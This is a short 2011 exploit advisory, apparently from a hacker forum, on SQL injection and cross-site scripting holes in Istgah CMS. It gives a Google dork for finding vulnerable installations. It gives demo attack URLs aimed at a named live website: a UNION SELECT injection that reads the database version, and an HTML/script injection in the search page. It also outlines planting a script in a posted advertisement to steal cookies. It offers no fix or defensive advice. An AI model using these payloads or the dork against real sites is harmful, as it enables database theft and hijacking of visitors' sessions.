=========================================================================== # Istgah Cms Multiple Vulnerability =========================================================================== ########################################################################### # Name: Istgah Cms Multiple Vulnerability # Vendor: http://www.iran-team.com/agahi1.html # Price: $40 # Date: 2011-04-15 # Author: Ashiyane Digital Security Team # Thanks to: 1337day.com,Securityreason.com,packetstormsecurity.com, # Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com # Home: www.ashiyane.org/forums/ ########################################################################### ########################################################################### [+] Dork: inurl:"view_ad.php?id=" & intext:"Power By :www.iran-team.com" ########################################################################### [+] SQL Injection Vulnerability: [+] Vulnerable Pages: view_ad.php & main_group.php & sub_group.php & ... [+] Demo: http://banketabligh.com/main_group.php?id=1/**/and/**/1=0/**/union/**/all/**/select/**/@@version ########################################################################### ########################################################################### [+] Cross Site Scripting / Html Injection Vulnerability: [+] Vulnerability: Search.php [+] Demo: http://banketabligh.com/search.php?val=%3Cmarquee%3E%3Cfont%20color=Blue%20size=15%3EXroGuE%3C/font%3E%3C/marquee%3E [+] You Can Put Ur Script in Search Field .. it'll save and After runing any tag alert will show :)) It's ..? [+] At LAst .. Stealing Cookie ~> Register > AddAdvertis(Agahie Jadid) > Your Script > ... ! ########################################################################### =========================================================================== # Gr33tz: # Ashiyane Members : BehroozIce,Q7x,,Virangar,Iman_taktaz,Keivan,Ali_eagle # Taghva,M3QD4D,PrinceOfHacking,Hidden-Hunter,Root3r,elvator,unique2world # Gladiator,Wahid,Encoder,mmilad200,n3me3iz,Classic,r3d.z0n3,injector,fr0nk # mzhacker,zend,milad-bushehr,aliakh,__amir__,anti206,ruin3r,Hijacker,Rz04 # & # 1337 Member: r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger # Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul, =========================================================================== # DisCovered By XroGuE !!!